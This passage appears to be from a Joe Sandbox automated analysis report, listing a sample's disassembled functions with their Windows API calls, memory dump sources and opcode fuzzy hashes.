                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                  • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                  • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                  Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                  • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                  Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                  • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                  Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                  • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                  • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                  Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                  • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3394109436-0
                                                                                                                                                                                  • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                  • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                  • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                  • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                  Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                                                                  • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                  • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                  • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                  Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                  • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                  Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                  • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                  • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                  • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                  Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                  • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                  • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                  • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                  Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                  • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                  Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4115351271-0
                                                                                                                                                                                  • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                  • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                  • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                  • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                  Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
